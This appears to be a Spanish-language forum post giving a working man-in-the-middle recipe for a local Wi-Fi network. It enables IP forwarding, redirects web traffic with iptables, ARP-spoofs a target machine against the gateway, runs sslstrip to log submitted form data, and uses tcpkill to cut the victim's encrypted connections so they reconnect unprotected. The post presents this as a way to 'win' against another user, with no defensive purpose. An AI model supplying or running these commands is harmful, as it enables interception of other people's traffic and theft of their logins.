Código [Seleccionar]
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
python sslstrip.py -p -k -w /home/tu_user/algun_archivo.log -l 8080
Para eso sirve el parámetro -k para cerrar las conexiones existentes el -p es para capturar solo el contenido post.
Otra alternativa es verificar a que dirección IP se encuentra conectado ejecuta el wireshark con filtro para esa IP, luego que detectes el sitio a donde tiene la conexión SSL usas:
Código [Seleccionar]
tcpkill -i wlan0 host ip_del_sitio
Ahora esperas un poco en lo que se cae su conexión y listo en unos segundos, al usuario se le cae la conexión, cierra el navegador, vuelve a abrirlo y habrás ganado.